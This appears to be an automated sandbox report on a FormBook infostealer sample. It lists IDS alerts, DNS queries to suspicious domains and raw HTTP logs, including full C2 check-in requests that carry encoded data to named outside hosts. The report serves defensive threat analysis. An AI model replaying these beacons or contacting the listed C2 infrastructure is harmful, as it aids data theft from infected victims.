                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50029 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50029 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50037 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50037 -> 188.114.97.3:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.huiguang.xyz
                Source: DNS query: www.schedulemassage.xyz
                Source: DNS query: www.030002128.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49753
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49957
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 06 Nov 2024 07:41:07 GMTserver: Apacheset-cookie: __tad=1730878867.8996817; expires=Sat, 04-Nov-2034 07:41:07 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 06 Nov 2024 07:41:09 GMTserver: Apacheset-cookie: __tad=1730878869.5521474; expires=Sat, 04-Nov-2034 07:41:09 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 06 Nov 2024 07:41:12 GMTserver: Apacheset-cookie: __tad=1730878872.4430285; expires=Sat, 04-Nov-2034 07:41:12 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: GET /hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.klohk.techConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.d63dm.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.servannto.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.telforce.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030002128.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.auto-deals-cz-000.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bzxs.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.huiguang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beingandbecoming.ltd
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.schedulemassage.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mcfunding.org
                Source: global trafficDNS traffic detected: DNS query: www.migorengya8.click
                Source: global trafficDNS traffic detected: DNS query: www.klohk.tech
                Source: global trafficDNS traffic detected: DNS query: www.d63dm.top
                Source: global trafficDNS traffic detected: DNS query: www.servannto.site
                Source: global trafficDNS traffic detected: DNS query: www.telforce.one
                Source: global trafficDNS traffic detected: DNS query: www.cesach.net
